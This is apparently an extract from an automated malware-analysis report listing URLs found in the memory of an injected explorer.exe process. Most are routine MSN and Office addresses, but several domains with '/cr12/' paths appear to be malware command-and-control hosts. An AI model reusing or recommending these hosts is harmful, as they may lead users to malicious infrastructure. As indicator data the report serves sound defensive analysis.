          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nff1291.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nff1291.com/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nff1291.com/cr12/www.henslotalt.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nff1291.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pedandmore.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pedandmore.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pedandmore.com/cr12/www.junongpei.website
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pedandmore.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priuswuxi.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priuswuxi.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priuswuxi.com/cr12/www.carneden.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.priuswuxi.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ptwix.xyz
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ptwix.xyz/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ptwix.xyz/cr12/www.65302.vip
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ptwix.xyz/cr12/www.footresort.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ptwix.xyzReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spiritualpath.info
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spiritualpath.info/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spiritualpath.info/cr12/www.sugardefender24-usa.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spiritualpath.infoReferer:
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugardefender24-usa.us
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugardefender24-usa.us/cr12/
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugardefender24-usa.us/cr12/www.nff1291.com
          Source: explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugardefender24-usa.usReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrendingproduct.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrendingproduct.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrendingproduct.com/cr12/www.veryaroma.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetrendingproduct.comReferer:
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/scishow
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.com/cr12/www.epuar.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.veryaroma.comReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bond/cr12/33333333
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.warehouse-inventory-80963.bondReferer:
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com/cr12/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.com/cr12/www.thetrendingproduct.com
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.winningpickleballshots.comReferer:
          Source: explorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.000000000905E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.000000000905F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.35224772424.0000000008FDA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?Jl
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=9F0A6F0F4E6E4C6D920024D11021271E&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961855101.0000000009263000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_In
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/MostlyCloudyNight.pn
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/MostlyCloudyNight.sv
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Teaser/humidity.png
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Most
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gD5m-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMd4-dark
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comJ
          Source: explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comi/
          Source: explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.coml0
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://go.redirectingat.com?id=74968X1553576&url=https%3A%2F%2Fwww.harpersbazaar.com%2Ffashion%2Ftr
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://imdb.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2XNwp.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA36Tom.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAX9kdV.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywOab.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1ncRjw.img
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://immieats.com/scishow.
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metacritic.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://movieweb.com/historically-accurate-war-movies/#we-were-soldiers
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://news.stanford.edu/2023/02/17/will-russia-ukraine-war-end/
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=f49d9883-4f80-4b3c-a960-1e7c
          Source: explorer.exe, 00000006.00000003.31961405842.000000000CA90000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230855468.000000000CA94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31967931569.000000000CAB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31961045545.000000000CA7F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000003.31967028878.000000000CA4B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.32856007373.000000000CA62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959277689.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000CA06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35230740761.000000000CA4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comb
          Source: explorer.exe, 00000006.00000003.31958579029.0000000004CBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30296440713.0000000004CC2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35223272761.0000000004CC2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comp
